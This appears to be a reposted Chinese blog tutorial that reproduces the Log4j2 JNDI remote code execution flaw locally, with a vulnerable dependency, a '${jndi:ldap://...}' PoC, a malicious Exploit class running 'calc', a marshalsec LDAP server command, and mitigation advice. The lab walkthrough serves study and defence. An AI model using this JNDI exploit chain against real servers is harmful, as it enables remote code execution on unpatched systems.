手把手復(fù)現(xiàn)了 Log4j2 漏洞，太可怕了。。

程序員的成長(zhǎng)之路

互聯(lián)網(wǎng)/程序員/技術(shù)/資料共享?

閱讀本文大概需要 2.8 分鐘。

來(lái)自：blog.csdn.net/qq_40989258/article/details/121862363

0x00 簡(jiǎn)介

ApacheLog4j2是一個(gè)開(kāi)源的Java日志框架，被廣泛地應(yīng)用在中間件、開(kāi)發(fā)框架與Web應(yīng)用中。

0x01 漏洞概述

該漏洞是由于Apache Log4j2某些功能存在遞歸解析功能，未經(jīng)身份驗(yàn)證的攻擊者通過(guò)發(fā)送特定惡意數(shù)據(jù)包，可在目標(biāo)服務(wù)器上執(zhí)行任意代碼。

0x02 影響范圍

Apache Log4j 2.x <= 2.15.0-rc1

0x03 環(huán)境搭建

創(chuàng)建一個(gè)新的maven項(xiàng)目，并導(dǎo)入Log4j的依賴包

????org.apache.logging.log4j
????log4j-core
????2.14.1

0x04 漏洞利用

1、使用POC測(cè)試

import?org.apache.logging.log4j.LogManager;
import?org.apache.logging.log4j.Logger;
class?LogTest?{
????public?static?final?Logger?logger?=?LogManager.getLogger();
????public?static?void?main(String[]?args)?{
????????logger.error("${jndi:ldap://localhost:8888/Exploit}");
????}
}

2、編譯一惡意類Exploit.class

首先新建exp.java，然后編譯為class文件

class?Exploit?{
????static?{
????????System.err.println("Pwned");
????????try?{
????????????String?cmds?=?"calc";
????????????Runtime.getRuntime().exec(cmds);
????????}?catch?(?Exception?e?)?{
????????????e.printStackTrace();
????????}
????}
}
javac?exp.java

3、使用marshalsec-0.0.3-SNAPSHOT-all.jar本地開(kāi)啟一個(gè)LDAP服務(wù)

java?-cp?marshalsec-0.0.3-SNAPSHOT-all.jar?marshalsec.jndi.LDAPRefServer
"http://127.0.0.1:7777/#Exploit"?8888

4、運(yùn)行poc.java，即可訪問(wèn)惡意類并執(zhí)行寫在其中的"calc"命令

結(jié)合一些其它 StrLookup 適當(dāng)變形，以及配合官方測(cè)試用例中臟數(shù)據(jù)"?Type=A Type&Name=1100110&Char=!"可繞過(guò)rc1，RC2版本對(duì)此異常進(jìn)行了捕獲。Spring Boot 學(xué)習(xí)筆記分享給你。

https://github.com/apache/logging-log4j2/compare/log4j-2.15.0-rc1...log4j-2.15.0-rc2

0x05 修復(fù)方式

目前，Apache官方已發(fā)布新版本完成漏洞修復(fù)，建議用戶盡快進(jìn)行自查，并及時(shí)升級(jí)至最新版本：

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

建議同時(shí)采用如下臨時(shí)措施進(jìn)行漏洞防范：

1）添加jvm啟動(dòng)參數(shù)-Dlog4j2.formatMsgNoLookups=true；

2）在應(yīng)用classpath下添加log4j2.component.properties配置文件，文件內(nèi)容為log4j2.formatMsgNoLookups=true；

3）JDK使用11.0.1、8u191、7u201、6u211及以上的高版本；

4）部署使用第三方防火墻產(chǎn)品進(jìn)行安全防護(hù)。

推薦閱讀：

一個(gè)員工的離職成本有多恐怖！

SpringBoot多線程環(huán)境下，解決多個(gè)定時(shí)器沖突問(wèn)題

互聯(lián)網(wǎng)初中高級(jí)大廠面試題(9個(gè)G)

內(nèi)容包含Java基礎(chǔ)、JavaWeb、MySQL性能優(yōu)化、JVM、鎖、百萬(wàn)并發(fā)、消息隊(duì)列、高性能緩存、反射、Spring全家桶原理、微服務(wù)、Zookeeper、數(shù)據(jù)結(jié)構(gòu)、限流熔斷降級(jí)......等技術(shù)棧！

?戳閱讀原文領(lǐng)??！? ? ? ? ? ? ? ??? ??? ? ? ? ? ? ? ? ? ?朕已閱?